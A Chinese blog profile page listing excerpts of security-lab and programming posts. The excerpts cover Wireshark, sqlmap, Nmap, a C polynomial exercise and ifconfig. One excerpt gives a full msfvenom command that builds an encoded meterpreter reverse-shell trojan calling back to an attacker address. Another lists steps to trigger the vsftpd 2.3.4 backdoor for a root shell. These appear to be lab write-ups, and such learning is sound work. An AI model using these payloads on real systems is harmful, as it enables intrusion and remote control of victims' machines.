- 博客(9)
- 收藏
- 关注
原创 FTP数据还原
FTP(File Transfer Protocol):是应用层的一个文件传输协议。主要作用是在服务器和客户端之间实现文件的传输和共享。FTP协议:允许TCP/IP网络上的两台计算机之间进行文件传输。而FTP服务是基于FTP协议的文件传输服务。工作时,一台计算机上运行FTP客户端应用程序,另一台计算机上需要运行FTP服务器端程序。只有拥有了FTP服务,客户端才能进行文件传输。利用WireShark打开实验实验数据data.pcapng。FTP服务器的IP地址是192.168.182.132.
2021-12-15 10:37:17
3117
原创 DVWA+SQLmap+Mysql注入实战
实验环境搭建。启动Metasploitable2虚拟机。1、注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1First name: adminSurname: admin返回正常;再次输入1',报错,返回You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right synta.
2021-12-15 10:21:29
332
原创 使用Wireshark软件抓包
实验网络拓扑1、A主机上外网,B运行sinffer(Wireshark)选定只抓源为A的数据)。1.1 写出以上过滤语句。这里我们在虚拟机中用kali来抓取win10的数据,首先要先确定我们的目标机和靶机在同一网段下,然后打开Wireshark,这里我们看到靶机的ip地址。ip.src==192.168.254.11.2 B是否能看到A和外网的通信(A刚输入的帐户和口令)?为什么? 不能,A和B所处的环境是在交换型以...
2021-12-15 10:04:02
2682
原创 NMAP使用
利用NMAP(攻击方)扫描发现Metasploitable2(靶机,需下载虚拟机镜像)IP地址,同时Wireshark捕获报文,分析NMAP扫描发现该主机的工作原理,即报文交互情况由上图可以看出两者实现链接是通过TCP协议:TCP(Transmission Control Protocol 传输控制协议)是一种面向连接(连接导向)的、可靠的、 基于IP的传输层协议。TCP工作在网络OSI的七层模型中的第四层——Transport层,IP在第三层——Network层,ARP 在第二层——Data L
2021-12-15 09:51:58
319
原创 漏洞复现:使用Kali制作木马程序
攻击机:Kali2019靶机:Win7 64位攻击步骤:1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe.
2021-12-15 09:38:39
6166
原创 笑脸漏洞利用
靶机metasploit :192.168.153.132使用nmap对靶机进行信息收集这里可以看到21端口是开放的,版本是vsftpd2.3.4,所以笑脸漏洞是存在的直接ftp连接靶机用户名:user:)密码随便填写这时靶机的6200端口会开启接下来用nc连接即可最后直接可以获取root权限了原文链接:https://blog.youkuaiyun.com/m0_62210217/article/details/121085654...
2021-12-15 09:35:05
3139
原创 数据结构:用链表表示多项式,并实现多项式的加法运算(C语言)
输入格式:输入在第一行给出第一个多项式POLYA的系数和指数,并以0,0 结束第一个多项式的输入;在第二行出第一个多项式POLYB的系数和指数,并以0,0 结束第一个多项式的输入。输出格式:对每一组输入,在一行中输出POLYA+POLYB和多项式的系数和指数。输入样例:5,0 2,1 1,6 8,15 0,0-2,1 3,6 4,8 0,0输出样例:5,0 4,6 4,8 8,15 分析首先要进行头文件的说明和结构体的定义#include<stdi.
2021-11-05 16:54:20
9055
6
转载 ifconfig 命令
1.命令格式: ifconfig[网络设备][参数]2.命令功能:ifconfig命令用来查看和配置网络设备。当网络环境发生改变时可通过此命令对网络进行相应的配置。3.命令参数:up: 启动指定网络设备/网卡。down :关闭指定网络设备/网卡。该参数可以有效地阻止通过指定接口的IP信息流,如果想永久地关闭一个接口,我们还需要从核心路由表中将该接口的路由信息全部删除。arp: 设置指定网卡是否支持ARP协议。-promisc :设置是否支持...
2021-11-01 17:20:42
5981
1
原创 2021-10-11
1. 什么是等保2.0我这里摘取知乎中知道创宇的回答:什么是等保2.0? - 知乎等保2.0于在2019年12月1日开始实施等保1.0回顾在开始讲等保2.0之前,让我们先回顾一下等保1.0。等保1.0发布距今已经有10多年的时间,在这些日子里,网络安全也越来越被人们所重视。在1.0的初期,企业只要有安全意识,能开始做等保,开始测评就已经很不错了;到了中期,整体防护,渗透测试,合规开始等于安全。行业等级保护全面开展,等保开始逐渐的深入人心;再到1.0的后期,无论是企业层面还是国家层面,都更
2021-10-11 14:14:19
257
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人